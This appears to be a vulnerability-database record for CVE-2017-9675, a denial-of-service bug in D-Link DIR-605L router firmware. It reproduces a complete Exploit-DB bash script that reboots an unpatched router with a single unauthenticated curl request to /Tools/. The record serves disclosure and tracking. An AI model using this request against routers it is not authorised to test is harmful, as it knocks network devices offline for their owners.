ID

VAR-E-201711-0123


CVE

cve_id:CVE-2017-9675

Trust: 1.5

sources: PACKETSTORM: 145011 // EXPLOIT-DB: 43147

EDB ID

43147


TITLE

D-Link DIR-605L < 2.08 - Denial of Service - Hardware dos Exploit

Trust: 0.6

sources: EXPLOIT-DB: 43147

DESCRIPTION

D-Link DIR-605L < 2.08 - Denial of Service. CVE-2017-9675 . dos exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 43147

AFFECTED PRODUCTS

vendor:d linkmodel:dir-605lscope:ltversion:2.08

Trust: 1.0

vendor:d linkmodel:dir605lscope: - version: -

Trust: 0.6

vendor:d linkmodel:dir605lscope:eqversion:2.08

Trust: 0.5

sources: PACKETSTORM: 145011 // EXPLOIT-DB: 43147 // EDBNET: 95061

EXPLOIT

# Exploit Title: D-Link DIR605L <=2.08 Denial of Service via HTTP GET (CVE-2017-9675)
# Date: 2017-11-14
# Exploit Author: Enrique Castillo
# Contact: https://twitter.com/_hyperlogic
# Detailed Analysis: http://hypercrux.com/bug-report/2017/06/19/DIR605L-DoS-BugReport/
# Vendor Homepage: http://us.dlink.com/
# Software Link: specific version no longer available on vendor site
# Version: 2.08UI and prior
# CVE : CVE-2017-9675
# Tested on Linux
###
# Description: Firmware versions 2.08UI and lower contain a bug in the function that handles HTTP GET requests for
# directory paths that can allow an unauthenticated attacker to cause complete denial of service (device reboot). This bug can be triggered
# from both LAN and WAN.
###
#!/usr/bin/env bash
# usage: ./sploit.sh <router_ip>
ROUTER=$1

if [ "$#" -ne 1 ]; then
echo "usage: $0 <router_ip>"
exit
fi

curl http://$ROUTER/Tools/

Trust: 1.0

sources: EXPLOIT-DB: 43147

EXPLOIT LANGUAGE

sh

Trust: 0.6

sources: EXPLOIT-DB: 43147

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 43147

TYPE

Denial of Service

Trust: 1.6

sources: EXPLOIT-DB: 43147 // EDBNET: 95061

TAGS

tag:exploit

Trust: 0.5

tag:web

Trust: 0.5

tag:denial of service

Trust: 0.5

sources: PACKETSTORM: 145011

CREDITS

Enrique Castillo

Trust: 0.6

sources: EXPLOIT-DB: 43147

EXTERNAL IDS

db:EXPLOIT-DBid:43147

Trust: 1.6

db:NVDid:CVE-2017-9675

Trust: 1.5

db:EDBNETid:95061

Trust: 0.6

db:PACKETSTORMid:145011

Trust: 0.5

sources: PACKETSTORM: 145011 // EXPLOIT-DB: 43147 // EDBNET: 95061

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-9675

Trust: 1.5

url:https://www.exploit-db.com/exploits/43147/

Trust: 0.6

sources: PACKETSTORM: 145011 // EXPLOIT-DB: 43147 // EDBNET: 95061

SOURCES

db:PACKETSTORMid:145011
db:EXPLOIT-DBid:43147
db:EDBNETid:95061

LAST UPDATE DATE

2022-07-27T09:58:23.795000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:145011date:2017-11-16T00:45:22
db:EXPLOIT-DBid:43147date:2017-11-14T00:00:00
db:EDBNETid:95061date:2017-11-15T00:00:00